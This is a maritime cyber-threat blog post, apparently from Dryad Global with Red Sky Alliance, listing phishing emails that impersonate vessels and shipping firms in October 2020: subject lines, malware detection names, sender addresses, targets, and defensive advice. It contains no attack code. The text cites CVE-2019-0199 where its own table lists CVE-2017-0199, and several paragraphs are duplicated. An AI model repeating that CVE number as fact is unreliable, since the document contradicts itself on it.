12 min read
Maritime Cyber Security & Threats Oct 2020 Week Three
By: Dryad Global on October 29, 2020 at 1:33 PM
Dryad and cyber partners RedSkyAlliance continue to monitor attempted attacks within the maritime sector. Here we continue to examine how email is used to deceive the recipient and potentially expose the target organisations.
"Fraudulent emails designed to make recipients hand over sensitive information, extort money or trigger malware installation on shore-based or vessel IT networks remains one of the biggest day-to-day cyber threats facing the maritime industry."
Dryad Global's cyber security partners, Red Sky Alliance, perform weekly queries of backend databases, identifying all new data containing Motor Vessel (MV) and Motor Tanker (MT) in the subject line of malicious emails. Email subject line Motor Vessel (MV) or Motor Tanker (MT) keyword usage is a common lure to entice users in the maritime industry to open emails containing malicious attachments.
With our cyber security partner we are providing a weekly list of Motor Vessels where it is observed that the vessel is being impersonated, with associated malicious emails.
The identified emails attempted to deliver malware or phishing links to compromise the vessels and/or parent companies. Users should be aware of the subject lines used and the email addresses that are attempting to deliver the messages.
Malicious Email collection 17 Oct- 24 Oct 2020
First Seen |
Subject Line Used |
Malware Detections |
Sending Email |
Targets |
Oct 19, 2020 |
Re: Bulk Cargo Shipment for sales@innotab.com |
Exploit:Win32/CVE-2017-11882!ml |
“Chen Xin” <felix.chen@longsailing.net> |
innotab.com |
Oct 19, 2020 |
CTM TO MASTER OF MV. SEA RUBY |
TrojanDownloader:O97M/Obfuse!MTB |
“Capt S. J. MOON” <caf9@7f2e96db3194.com> |
5d104289d17.za |
Oct 20, 2020 |
Payment details from Sea Pine Power Limited |
Trojan:Win32/Woreflint.A!cl |
"Viky" <hr@maheendran.pw> |
Targets Not Disclosed |
Oct 20, 2020 |
PO 14704 - MEL - 20\' TC Reefer / Sailing Schedule |
Trojan:Script/Wacatac.C!ml |
"Pakkaporn Srisuk" <info2@s-world.co.th> |
fametech.com.tw |
Oct 20, 2020 |
Re: [NAPAfrica Peers] Nap port down |
Trojan-Downloader.VBA.Emotet |
"Peers" <d16e3529f8e5e93e@b684bc0279577cd573.com> |
801c409e90ac02.net |
Oct 20, 2020 |
WG: PO 14704 - MEL - 20\' TC Reefer / Sailing Schedule |
Trojan:Win32/Woreflint.A!cl |
“Seiler Stephan” jgenaro@pernoscorona.net” |
hoffmanneitle.com |
Oct 20, 2020 |
Re: Bigfoot Express Freight: Statement, |
VBA/TrojanDownloader.Agent.UFY |
"debtors1@bigfootexpress.co.za" <1b9644c86f@695e866eff3.mx> |
6f608b02d.za |
Oct 20, 2020 |
Re: Container Arrival |
Trojan.W97M.EMOTET.SMBA |
"ssun@suntex.co.za" <1d23ac1ceaa6d53@2ffb39a.com> |
6f608b02d.za |
Oct 20, 2020 |
Re: Request of Vessel information for ESI(Environmental Ship Index) |
W97M/Downloader.dfu |
<paola@formatolibero.it> |
smlines.com |
Oct 21, 2020 |
RE: OCEAN GIFT PO: Y\xc3\xaau c\xe1\xba\xa7u b\xc3\xa1o gi\xc3\xa1 WK49 - GB-75030-508034041 - OCEAN GIFT VIETNAM ORDER - OCTOBER 2020 |
HEUR:Exploit.MSOffice.CVE-2017-0199.a |
Chien Dang <Chien.Dang@icore.com.vn> |
icore.com.vn |
Oct 21, 2020 |
SEA BOOKING// BUYER# AZ PLANNING CO. LTD. |
Trojan-Downloader.MSWord.Agent.buh |
Sakil-Starlet <com@starletbd.com> |
xinhua.org |
Oct 21, 2020 |
Mv Tiksy / Disch anthracite Asd - update prospects |
VBA/TrojanDownloader.Agent.USA |
"Tom Koster" <gianna@lapiramidesrl.it> |
c-star-resources.net |
Oct 23, 2020 |
Norstar Baltic // 10,000mt Benzene // PDA Request |
Trojan:Win32/Woreflint.A!cl |
Sinosteel Shipping Agency" <oper@dowausa.com> |
hlcfinancier.com |
In the above collection, we see malicious actors attempting to use vessel names to try to spoof companies in the maritime supply chain. This week we observed a wide variety of maritime-related subject lines. Some of the new vessel names used this week include “MV Sea Ruby” and “Mv Tiksy” among others.
Analysts observed malicious subject line “SEA BOOKING// BUYER# AZ PLANNING CO. LTD.” used this week. It appears to be a spam email that was sent to numerous recipients. There are a few parts of the email that indicate this is the case.
The email message begins with a standard “Dear Sir” generic greeting. Attackers commonly use this greeting when sending out malicious spam. The email sender also references the “invoice” attachment but does not identify which shipment or shipping order is being discussed. The sender does not appear to be a native English speaker based on the grammar and verbiage used in the email.
Interestingly the target of the email is the Xinhua News Agency, based in China. This is the state-run press agency of the People’s Republic of China. There is no clear legitimate reason why someone would send the news agency an invoice and packing list document. Also, the target email address in this case is info[at]xinhua[.]org which does not appear to register to any specific employee. It appears that email is used by the news agency for general inquires.
The malicious attachment “invoice & Packing list.docx” contains malware that exploits CVE-2019-0199. A successful attack would allow attackers to execute arbitrary code via this specially crafted document. This essentially gives an attacker the ability to run commands on the target host remotely.
Analysts observed another malicious email subject line “RE: OCEAN GIFT PO: Y\xc3\xaau c\xe1\xba\xa7u b\xc3\xa1o gi\xc3\xa1 WK49 - GB-75030-508034041 - OCEAN GIFT VIETNAM ORDER - OCTOBER 2020” this week, sent from one employee to another at iCore Solutions. This is a Vietnam-based IT managed service provider.
Although the email comes from an outside source, an employee at the company forwarded the email as an “FYI” for others. This malicious attachment also exploited CVE-2019-0199. This is another example of how employees are sometimes unwitting actors in the spread of malware across a company network. The fact that some of the email recipients work for different companies indicates that this could also be an example of a supply chain attack.
Top 5 Malicious Senders
Sender |
Malware Sent |
support@hoffmanneitle.com |
MSIL/GenKryptik.EUUO!tr, MSExcel/Kryptik.AE!tr.dldr, W32/GenKryptik.EKLE!tr, VBA/Agent.AVL!tr |
noreply@wdc.com |
Backdoor.Win32.Androm.ghqa |
kontakt@ziegis-zeltverleih.de |
Backdoor.Win32.Androm.ghqa |
felix.chen@longsailing.net |
Exploit:Win32/CVE-2017-11882!ml |
s.parvin@computerfutures.de |
Backdoor.Win32.Androm.ghqa |
These analytical results illustrate how a recipient could be fooled into opening an infected email. They also demonstrate how common it is for attackers to specifically target pieces of a company’s supply chain to build up to cyber-attacks on the larger companies. Doing so could cause the recipient to become an infected member of the maritime supply chain and thus possibly infect victim vessels, port facilities and/or shore companies in the marine, agricultural, and other industries with additional malware.
These analytical results illustrate how a recipient could be fooled into opening an infected email. They also demonstrate how common it is for attackers to specifically target pieces of a company’s supply chain to build up to cyber-attacks on the larger companies. Doing so could cause the recipient to become an infected member of the maritime supply chain and thus possibly infect victim vessels, port facilities and/or shore companies in the marine, agricultural, and other industries with additional malware.
These analysis results illustrate how a recipient could be fooled into opening an infected email. Doing so could cause the recipient to become an infected member of the maritime supply chain and thus possibly infect victim vessels, port facilities and/or shore companies in the marine, agricultural, and other industries with additional malware.
Fraudulent emails designed to make recipients hand over sensitive information, extort money or trigger malware installation on shore-based or vessel IT networks remains one of the biggest day-to-day cyber threats facing the maritime industry. These threats often carry a financial liability to one or all those involved in the maritime transportation supply chain. Preventative cyber protection offers a strong first-line defence by preventing deceptive messages from ever reaching staff inboxes, but malicious hackers are developing new techniques to evade current detection daily. Using pre-emptive information from Red Sky Alliance-RedXray diagnostic tool, our Vessel Impersonation reports, and Maritime Blacklists offer a proactive solution to stopping cyber-attacks. Recent studies suggest cyber-criminals are researching their targets and tailoring emails for staff in specific roles. Another tactic is to spoof emails from the chief executive or other high-ranking maritime contemporaries in the hope staff lower down the supply chain will drop their awareness and follow the spoofed email obediently. Analysts across the industry are beginning to see maritime-specific examples of these attacks.
Pre-empt, don't just defend
Preventative cyber protection offers a strong first-line defense by preventing deceptive messages from ever reaching staff inboxes, but malicious hackers are developing new techniques to evade current detection daily. Using preemptive information from Red Sky Alliance RedXray diagnostic tool, our Vessel Impersonation reports and Maritime Blacklists offer a proactive solution to stopping cyber-attacks. Recent studies suggest cyber-criminals are researching their targets and tailoring emails for staff in specific roles. Another tactic is to spoof emails from the chief executive or other high-ranking maritime contemporaries in the hope staff lower down the supply chain will drop their awareness and follow the spoofed email obediently. Analysts across the industry are beginning to see maritime-specific examples of these attacks.
The more convincing an email appears, the greater the chance employees will fall for a scam. To address this residual risk, software-based protection should be treated as one constituent of a wider strategy that also encompasses the human-element as well as organizational workflows and procedures.
It is imperative to:
- Train all levels of the marine supply chain to realize they are under constant cyber-attack.
- Stress maintaining constant attention to real-world cyber consequences of careless cyber practices or general inattentiveness.
- Provide practical guidance on how to look for a potential phishing attempt.
- Use direct communication to verify emails and supply chain email communication.
- Use Red Sky Alliance RedXray proactive support, our Vessel impersonation information and use the Maritime Black Lists to proactively block cyber attacks from identified malicious actors.
Related Posts
Maritime Cyber Security & Threats Sep 2020 Week..
Dryad and cyber partners RedSkyAlliance continue to monitor the stark upward trend in attempted..
Maritime Cyber Security & Threats December 2020..
Dryad and cyber partners RedSkyAlliance continue to monitor attempted attacks within the maritime..
Maritime Cyber Security & Threats Sep 2020 Week..
Dryad and cyber partners RedSkyAlliance continue to monitor the stark upward trend in attempted..